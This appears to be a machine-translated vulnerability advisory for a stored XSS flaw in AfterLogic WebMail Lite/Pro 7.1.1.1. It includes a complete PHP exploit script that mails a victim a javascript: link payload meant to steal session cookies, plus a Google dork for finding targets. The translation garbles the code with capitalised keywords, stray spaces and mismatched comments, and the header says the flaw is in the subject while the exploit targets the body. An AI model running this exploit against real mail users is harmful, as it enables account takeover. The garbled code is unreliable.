AfterLogic WebMail Lite/Pro subject script insertion Vulnerability

Release date:
Updated on:

Affected Systems:
AfterLogic WebMail Lite 7.1.1.1
Description:
--------------------------------------------------------------------------------
AfterLogic WebMail Lite is a fast and easy-to-use Webmail frontend system that supports POP3/IMAP accounts, SMTP and SSL (including Gmail ).

AfterLogic WebMail Lite and WebMail Pro 7.1.1.1 and other versions do not properly filter the mail subject, which allows remote attackers to inject arbitrary HTML and script code and then execute it in the user's browser session.

<* Source: Saeed reza Zamanian

Link: http://secunia.com/advisories/56547/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

<? Php

/*
# Exploit Title: AfterLogic Pro and Lite <= 7.1.1.1 Stored XSS
# Google Dork: intext: "AfterLogic" intext: "Login Information" inurl: index. php
# Day: 19 Jan 2014
# Exploit Author: Saeed reza Zamanian [s. zamanian [AT] imenantivirus.com]
# Vendor Homepage: http://www.afterlogic.com/
# Software Link: http://www.afterlogic.com/download/webmail-pro
# Version: <= 7.1.1.1
# Tested on: KALI Linux 1.0.5 (Debian) Apache/2.2.22
# CVE: vendor id = 6423

Greetz: H. Zamanian, K. Random, K. Khani

WebApp Desciption:
AfterLogic WebMail is a browser-based e-mail and collaboration front end,
Designed to work with your existing messaging solutions. From an administrator's
Perspective, the application is easy to install on your own server, easy to integrate and
Easy to maintain.

Vulnerability Description:
XSS codes can be stored in E-Mail Body.
So you can send an email to the Victim with below payload and steal the victim's cookie.

<A href = javaScRipt: alert (document. cookie)> Click Me, Please... </a> \ r \ n

NOTE: javascript html char encode = javaScRipt

Then you will be able to get into the victim's mailbox via the url:
Http: // [WebSite]/[AfterLogic]/Default. aspx

# Phpmailer class is pinned in the exploit so you need to download it here and run the exploit in the phpmailer directory:
Http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list

*/

Echo "<title> AfterLogic Pro and Lite <= 7.1.1.1 XSS Exploit </title> ";
Require_once ('class. phpmailer. php ');

$ Mail = new PHPMailer (true); // the true param means it will throw throtions on errors, which we need to catch
$ Mail-> IsSMTP (); // telling the class to use SMTP

/* SETTINGS */
$ Smtp_user = "username"; // Any valid smtp account
$ Smtp_pass = "password"; // Your PASSWORD
$ Smtp_port = "25"; // smtp port Default: 25
$ Smtp_host = "localhost"; // Any valid smtp server
$ From = "attacker@email.com"; // Any email
$ Victim = "victim@email.com"; // Victim email on afterlogic webmail.
$ Subject = "Salam"; // Subject

/* Body Text */
$ Body = '<a href = javaScRipt: alert (document. cookie)> Click Me, Please... </a> \ r \ n ';

 

Try {
$ Mail-> SMTPDebug = 2; // enables SMTP debug information (for testing)
$ Mail-> SMTPAuth = false; // enable SMTP authentication
$ Mail-> Host = $ smtp_host;
$ Mail-> Port = $ smtp_port;
$ Mail-> Username = $ smtp_user; // SMTP account username
$ Mail-> Password = $ smtp_pass; // SMTP account password

$ Mail-> SetFrom ($ from, 'attacker ');
$ Mail-> AddReplyTo ($ from, 'attacker ');

$ Mail-> AddAddress ($ victim, 'victim ');
$ Mail-> Subject = $ subject;

$ Mail-> MsgHTML ($ body );
$ Mail-> Send ();
Echo "Message Sent OK </p> \ n ";
} Catch (phpmailerException $ e ){
Echo $ e-> errorMessage ();
} Catch (Exception $ e ){
Echo $ e-> getMessage ();
}
?>

</Body>
</Html>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

AfterLogic
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.afterlogic.com/download/webmail-pro